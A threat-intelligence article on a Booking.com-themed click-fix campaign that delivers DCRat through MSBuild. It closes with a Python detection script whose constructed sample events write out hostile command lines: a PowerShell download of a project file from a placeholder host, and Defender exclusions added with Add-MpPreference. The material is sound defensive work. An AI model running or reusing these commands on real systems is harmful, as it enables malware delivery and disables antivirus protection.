A sophisticated malware campaign called PHALTBLYX has emerged, combining social engineering deception with advanced evasion techniques to compromise hospitality sector organizations.
The attack chain begins with phishing emails impersonating Booking.com, featuring urgent reservation cancellation alerts with large financial charges displayed in euros.
These messages direct victims to fake Booking.com websites that appear visually identical to the legitimate service, exploiting user anxiety about fraudulent transactions.
The attack progresses through a carefully orchestrated series of stages designed to bypass traditional security controls. Once victims click the refresh button on the fake page, their browser displays a full-screen blue screen of death animation.
This simulated crash prompts users to follow on-screen instructions that involve pressing specific keyboard combinations.
Securonix analysts identified that the malware silently copies a PowerShell command to the clipboard, which victims unknowingly execute when following the displayed instructions.
Securonix researchers noted that this click-fix social engineering method represents a critical evolution in the attack’s delivery mechanism.
The technique relies on manual user execution rather than automated processes, effectively circumventing security controls that would block script execution.
The malicious PowerShell command performs several functions, including opening the legitimate Booking.com admin page as a distraction while downloading an MSBuild project file from remote servers.
Infection mechanism
The infection mechanism leverages Microsoft's legitimate MSBuild.exe build tool to execute the downloaded v.proj project file, a technique known as living off the land.
Because execution is proxied through a trusted, signed Windows utility, this approach often bypasses application whitelisting and antivirus detection.
Once executed, the malware disables Windows Defender by adding broad file extension exclusions and specific directory exclusions, ensuring subsequent payloads remain undetected.
The final payload is a customized variant of DCRat, a remote access trojan capable of extensive system compromise. The RAT establishes persistence using internet shortcut files placed in the Windows startup folder, disguised as legitimate system utilities.
Upon connection to command and control servers, the malware collects comprehensive system information including hardware identification, operating system details, installed antivirus software, and active window titles.
The malware’s capabilities include keylogging, process injection into legitimate system binaries like aspnetcompiler.exe, and downloading additional malicious payloads.
The presence of Cyrillic language artifacts and Russian debugging strings strongly indicates Russian-speaking threat actors. Organizations should implement rigorous user awareness training regarding click-fix tactics and monitor suspicious MSBuild.exe executions originating from non-standard directories to detect and prevent similar attacks.
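The detection guidance above (MSBuild.exe running from or against non-standard directories, Defender exclusions being added, and .url shortcuts landing in the Startup folder) can be turned into simple rules over process- and file-creation telemetry. The following is an added example written for this article; it is not Securonix's code, and the log lines it scans are constructed in a simplified, pipe-delimited Sysmon-like format rather than being real telemetry from the campaign. The trusted MSBuild install directories, the "shell parent" heuristic, the assumption that exclusions are added via Add-MpPreference, and all paths and hostnames (placeholder.invalid) are assumptions to tune per environment.

```python
"""Detection heuristics for the PHALTBLYX-style chain described in the article.

Added example, not Securonix's code. Input lines are constructed here in a
simplified Sysmon-like format:
    kind|image|command_line|parent_image|target_path
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str          # "ProcessCreate" or "FileCreate"
    image: str         # full path of the process image
    command_line: str
    parent_image: str
    target_path: str   # only populated for FileCreate events


def parse_event(line: str) -> Event:
    """Parse one pipe-delimited telemetry line into an Event."""
    fields = line.split("|")
    if len(fields) != 5:
        raise ValueError(f"malformed event: {line!r}")
    return Event(*fields)


# Assumption: the only places MSBuild.exe legitimately runs from in this environment.
TRUSTED_MSBUILD_DIRS = (
    "c:\\windows\\microsoft.net\\framework",
    "c:\\windows\\microsoft.net\\framework64",
    "c:\\program files\\microsoft visual studio",
    "c:\\program files (x86)\\microsoft visual studio",
)
# User-writable locations where a downloaded project file would typically be dropped.
USER_WRITABLE_DIRS = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
PROJECT_FILE_RE = re.compile(r"\.\w*proj\b")
# Assumption: exclusions are added with the Add-MpPreference cmdlet.
DEFENDER_EXCLUSION_RE = re.compile(r"add-mppreference.*-exclusion(extension|path)")
STARTUP_URL_RE = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.url$", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: Event) -> list[str]:
    """Return the names of all rules the event triggers (empty list if none)."""
    hits: list[str] = []
    img, cmd, parent = ev.image.lower(), ev.command_line.lower(), basename(ev.parent_image)
    if ev.kind == "ProcessCreate":
        if basename(ev.image) == "msbuild.exe":
            # MSBuild binary running outside its install locations (copied or renamed LOLBin)
            if not img.startswith(TRUSTED_MSBUILD_DIRS):
                hits.append("msbuild_untrusted_image_path")
            # MSBuild building a project file that lives in a user-writable directory
            if any(d in cmd for d in USER_WRITABLE_DIRS) and PROJECT_FILE_RE.search(cmd):
                hits.append("msbuild_project_in_user_writable_dir")
            # Assumption: build tools, not interactive shells, normally launch MSBuild
            if parent in ("powershell.exe", "pwsh.exe", "cmd.exe"):
                hits.append("msbuild_spawned_by_shell")
        if basename(ev.image) in ("powershell.exe", "pwsh.exe"):
            if DEFENDER_EXCLUSION_RE.search(cmd):
                hits.append("defender_exclusion_added")
            # Assumption: a pasted click-fix command is launched from the desktop shell
            if parent == "explorer.exe" and "http" in cmd:
                hits.append("powershell_from_explorer_with_url")
    elif ev.kind == "FileCreate" and STARTUP_URL_RE.search(ev.target_path):
        hits.append("url_shortcut_in_startup_folder")
    return hits


def scan(lines) -> dict[int, list[str]]:
    """Map line index -> triggered rules for every line that triggers at least one."""
    return {i: h for i, line in enumerate(lines) if (h := check_event(parse_event(line)))}


# Constructed sample telemetry (not real data from the campaign).
CONSTRUCTED_EVENTS = [
    r"ProcessCreate|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe|MSBuild.exe C:\src\app\app.csproj|C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe|",
    r"ProcessCreate|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Invoke-WebRequest http://placeholder.invalid/v.proj -OutFile C:\Users\alice\AppData\Local\Temp\v.proj|C:\Windows\explorer.exe|",
    r"ProcessCreate|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe|MSBuild.exe C:\Users\alice\AppData\Local\Temp\v.proj|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|",
    r"ProcessCreate|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Add-MpPreference -ExclusionExtension exe,dll -ExclusionPath C:\Users\alice\AppData\Local\Temp|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe|",
    r"FileCreate|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe||C:\Windows\explorer.exe|C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemSettings.url",
    r"ProcessCreate|C:\Users\alice\AppData\Local\Temp\MSBuild.exe|MSBuild.exe C:\Users\alice\AppData\Local\Temp\v.proj|C:\Windows\explorer.exe|",
]

if __name__ == "__main__":
    for idx, rules in scan(CONSTRUCTED_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

The first sample line (a developer build launched from Visual Studio) triggers nothing, which is the point of keeping an allow-list of install directories rather than alerting on every MSBuild.exe start; the remaining lines each reproduce one stage of the chain described above and trigger the corresponding rule. In production the same rules map onto Sysmon Event ID 1 and 11 fields or the equivalent EDR telemetry.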
